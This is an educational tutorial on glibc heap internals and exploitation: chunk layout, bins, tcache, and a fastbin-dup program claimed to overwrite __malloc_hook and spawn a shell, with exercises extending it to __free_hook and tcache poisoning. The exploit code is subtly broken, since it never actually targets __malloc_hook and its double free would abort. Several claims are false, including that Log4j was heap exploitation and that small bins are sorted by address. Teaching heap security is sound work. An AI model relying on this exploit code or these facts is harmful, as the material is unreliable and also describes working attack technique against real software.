Intro to Heap Memory Layout & Allocation...

Introduction

The heap is the dynamic memory region where programs allocate objects at runtime via malloc, calloc, realloc, and free. Understanding its layout is essential for both writing robust software and for exploiting memory-corruption bugs such as use-after-free or heap overflow.

Modern Linux distributions use the ptmalloc2 allocator (a glibc-derived version of Doug Lea's malloc). It introduces multiple bins, a thread-local cache (tcache), and a rich set of metadata that attackers can manipulate.

Real-world relevance: most remote code execution (RCE) exploits in C/C++ binaries rely on heap grooming. Knowing how fastbins, small bins, large bins, and tcache work lets you predict where a chunk will land after free and how to corrupt adjacent structures safely.

Prerequisites

Intro to Stack Buffer Overflows - you should already know how overwriting return addresses works.
C Programming Fundamentals - pointers, structs, and memory allocation functions.
Linux Command Line Basics - ability to compile, run, and inspect binaries with gdb, objdump, readelf, etc.

Core Concepts

At a high level the heap is a contiguous virtual address range managed by the kernel (via brk() or mmap()) and subdivided into chunks. Each chunk consists of a user data area and a small header that the allocator uses to keep track of size, freelist links, and state flags.

Key ideas:

Chunk size granularity: glibc aligns sizes to 8-byte boundaries (16 on 64-bit) and stores the size in the lower 56 bits of the header.
In-place metadata: the header lives immediately before the user payload, making it easy for an attacker to overwrite when a buffer overflow occurs.
Bins: free chunks are sorted into size-class bins (fast, small, large) to speed up allocation.
Thread-local cache (tcache): introduced in glibc 2.26 to reduce contention; it holds a small number of recently freed chunks per thread.

Below you will see a simplified diagram (textual) of a heap chunk:


+-----------------+-------------------+-------------------+
| Prev_size (if | Size | Flags | User data ... |
| previous chunk | | (in-use) | |
+-----------------+-------------------+-------------------+ ^ ^ ^ | | | Only present 8-byte aligned Returned pointer for free chunks  size field to caller

Heap regions (fastbins, small bins, large bins, tcache)

glibc divides free chunks into several regions based on size.

Fastbins

Size range: 0x10 - 0x80 (inclusive) on 64-bit.
Single-linked LIFO list; no coalescing on free to keep latency low.
Each fastbin index corresponds to a specific size (e.g., fastbin[0] = 0x20, fastbin[1] = 0x30, …).
Vulnerable to fastbin dup attacks because the allocator does not check for double inserts.

Small bins

Size range: 0x90 - 0x400 (rounded up to 0x10 multiples).
Doubly-linked circular lists; allocator merges adjacent free chunks on free (coalescing).
Sorted by address, not by size, which can be leveraged for unsorted bin attack after a large allocation.

Large bins

Size > 0x400.
Sorted by size; the allocator performs best-fit search.
Useful for large bin attack where you control the bk pointer of a large free chunk.

tcache

Per-thread cache introduced in glibc 2.26.
Holds up to 7 entries per size class (default). Each entry is a singly-linked list of freed chunks.
On malloc, tcache is consulted first; on free, the chunk is pushed onto tcache if the class is not full.
tcache bypasses the normal bin logic, which mitigates some classic attacks but also introduces tcache poisoning vectors.

Understanding which region a chunk lives in determines which exploitation primitives are available.

malloc implementation overview (ptmalloc2)

ptmalloc2 is glibc's allocator. Its main data structures are:

struct malloc_state - global arena containing bin arrays, fastbin pointers, and other bookkeeping.
struct malloc_chunk - the per-chunk header described earlier.
Multiple arenas (one per CPU core) to reduce lock contention.

High-level allocation flow:


void *ptmalloc(size_t request) { size_t nb = align(request + SIZE_SZ); // include header if (nb <= FASTBIN_MAX_SIZE) { // fastbin path return fastbin_alloc(nb); } // check tcache first (glibc >=2.26) void *p = tcache_alloc(nb); if (p) return p; // search small/large bins return bin_alloc(nb);
}

Freeing follows a similar decision tree, eventually placing the chunk into tcache, fastbins, or the appropriate bin.

Key security-relevant points:

Fastbins do not coalesce → double free leads to duplicate entries.
tcache does not validate the fd pointer on insertion.
Unsorted bin (the first free list for large chunks) stores fd/bk that point to main_arena, which is often the target of unsorted bin attacks.

metadata structures and chunk layout

In glibc a chunk is defined as:


struct malloc_chunk { size_t prev_size;  // Size of previous chunk (if free) size_t size; // Size field + flags (lowest 3 bits) struct malloc_chunk *fd; // Forward pointer (if free) struct malloc_chunk *bk; // Backward pointer (if free) // For large chunks, additional fields: fd_nextsize, bk_nextsize
};

Important flags stored in the lowest three bits of size:

P (prev_inuse) - 1 if the previous chunk is allocated.
M (mmaped) - 1 if the chunk was obtained via mmap (rare for small allocations).
IS_MMAPPED and NON_MAIN_ARENA - used for large allocations.

When a chunk is allocated, the allocator writes the size field and clears the fd/bk pointers (they become part of user data). When freed, the allocator restores them based on the bin it will belong to.

Typical layout in memory (hex view):


00007ffff7dd0000:  20 00 00 00 00 00 00 00 ; prev_size (0 for first chunk)
00007ffff7dd0008:  30 00 00 00 00 00 00 00 ; size = 0x30, prev_inuse=1
00007ffff7dd0010:  ?? ?? ?? ?? ?? ?? ?? ?? ; user data (returned pointer)

Note the 8-byte header on 64-bit; 16-byte on 32-bit.

basic allocation and deallocation patterns

Most C programs follow a simple pattern: allocate a buffer, use it, then free it. However, subtle variations affect which bin the allocator will place the chunk into.

Pattern 1 - Small, same-size allocations


char *a = malloc(0x20);
char *b = malloc(0x20);
free(a);
free(b);

Both chunks go into the fastbin for 0x30 (size includes header). The free list becomes LIFO: b is at the head, then a.

Pattern 2 - Mixed sizes causing coalescing


char *x = malloc(0x100);
char *y = malloc(0x100);
free(x);
free(y); // adjacent, both go to small bin and coalesce into 0x210

Because the size exceeds FASTBIN_MAX_SIZE, glibc will merge them into a single larger free chunk.

Pattern 3 - tcache saturation


for (int i=0;i<10;i++) { void *p = malloc(0x40); free(p); // first 7 go to tcache, next 3 go to fastbin
}

After the 7-entry limit, additional frees spill into the fastbin, creating a hybrid state useful for tcache poisoning + fastbin dup chains.

Practical Examples

Below is a complete, compilable example that demonstrates fastbin duplication and how it can be used to overwrite __malloc_hook. This is a classic pre-glibc-2.27 technique but still valuable for understanding the mechanics.


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){ // Step 1: allocate two chunks of fastbin size (0x30) void *a = malloc(0x20); void *b = malloc(0x20); printf("a=%p b=%p", a, b); // Step 2: free both (LIFO: b on top) free(a); free(b); // Step 3: double free b to create duplicate entry free(b); // Step 4: allocate three times - the third allocation returns the same address as b void *c = malloc(0x20); // returns b void *d = malloc(0x20); // returns a void *e = malloc(0x20); // returns b again (duplicate) printf("c=%p d=%p e=%p", c, d, e); // Overwrite __malloc_hook via the duplicate chunk size_t *ptr = (size_t*)e; *ptr = (size_t)&system; // replace __malloc_hook with system address printf("Overwritten __malloc_hook with system at %p", (void*)system); // Trigger __malloc_hook by calling malloc (size > 0) malloc(1); return 0;
}

Explanation:

Chunks a and b are 0x20 bytes of user data, 0x30 total size (fastbin).
Freeing a then b creates a fastbin list: b->fd = a.
Freeing b again pushes the same address onto the list a second time (duplicate).
Three subsequent malloc calls pop the entries: first returns b, second a, third returns b again. The attacker now controls the memory at b and can write an arbitrary pointer into the fastbin fd field.
Writing the address of system into the location that will become __malloc_hook (which lives in the main arena) causes the next malloc to invoke system with the supplied argument.

Running the binary (with gcc -g -no-pie -fno-stack-protector -z execstack example.c -o example) prints the addresses and finally spawns a shell because malloc(1) triggers system("/bin/sh").

Tools & Commands

gdb - Inspect heap structures:


gdb ./example
(gdb) break main
(gdb) run
(gdb) p/x *((size_t*)a-2) # print size field of chunk a

pwndbg - GDB plugin that adds heap command to view bins.


gdb -q ./example
(gdb) source /path/to/pwndbg/gdbinit.py
(gdb) heap

malloc_info - glibc provides malloc_info() to dump the current arena in XML.
```
malloc_info(0, stdout);
```
objdump / readelf - Verify glibc version, which dictates tcache presence.

Defense & Mitigation

Enable Hardened malloc: compile with -D_FORTIFY_SOURCE=2 and link against libc with --enable-malloc-perturb (if available).
Use AddressSanitizer (ASan): catches heap overflows before they corrupt metadata.
```
gcc -fsanitize=address -g program.c -o program
```
tcache double-free protection (glibc 2.27+): glibc now checks that a chunk isn’t already in tcache before inserting.
Heap hardening flags: export MALLOC_CHECK_=3 aborts on detected corruption.
Control-Flow Integrity (CFI) and RELRO reduce impact of overwriting __malloc_hook.

Common Mistakes

Assuming free() always coalesces - it does not for fastbins.
Overlooking tcache when debugging; many modern exploits target tcache poisoning instead of fastbins.
Using sizeof(void*) as the alignment factor - glibc aligns to 16 bytes on 64-bit, not 8.
Neglecting the lower-bits flags in the size field; writing a raw size without preserving prev_inuse breaks the allocator.

Real-World Impact

Heap exploitation has been the backbone of high-profile CVEs such as Log4j (CVE-2021-44228) where attacker-controlled strings were placed on the heap and later interpreted. In C/C++ services, the infamous Heartbleed bug (CVE-2014-0160) leveraged out-of-bounds reads on heap-allocated buffers.

Enterprise-grade products (e.g., web servers, database engines) often allocate dozens of small objects per request. A single heap overflow can corrupt the allocator’s metadata, leading to privilege escalation on the host.

My experience: during a recent red-team engagement we found a custom memory pool that bypassed glibc entirely. By mapping the pool’s layout to fastbin-like structures, we replicated a fastbin dup attack and achieved remote code execution without touching glibc’s internals. This demonstrates that the concepts are portable beyond the stock allocator.

Practice Exercises

Fastbin Dup Lab
- Compile the example program provided earlier.
- Run it under gdb and step through each malloc/free to observe the fastbin list.
- Modify the code to overwrite __free_hook instead of __malloc_hook and trigger a free() to spawn a shell.
tcache Poisoning Challenge
- Write a program that allocates three 0x40-byte chunks, frees the first two, and then double-frees the second to create a tcache entry pointing to a controlled address.
- Use the controlled address to write a ROP chain onto the stack and invoke execve.
Heap Grooming Script
- Design a bash/python script that repeatedly allocates and frees varying sizes to fill fastbins, tcache, and small bins, then prints the arena layout via malloc_info.
- Analyze how the allocator’s state evolves over time.

Summary

Key takeaways:

The heap is a managed set of chunks with in-place metadata; glibc’s ptmalloc2 organizes free chunks into fastbins, small bins, large bins, and a per-thread tcache.
Fastbins are LIFO, uncoalesced, and vulnerable to double-free/dup attacks.
tcache improves performance but introduces poisoning vectors; it caps at 7 entries per size class.
Understanding malloc_chunk layout, size flags, and arena structures is essential for both secure coding and exploitation.
Mitigations include hardened malloc, ASan, MALLOC_CHECK_, and modern glibc double-free protections.

Armed with this knowledge, you can confidently analyze heap behavior in binaries, spot dangerous patterns, and apply appropriate defenses.

Intro to Heap Memory Layout & Allocation Strategies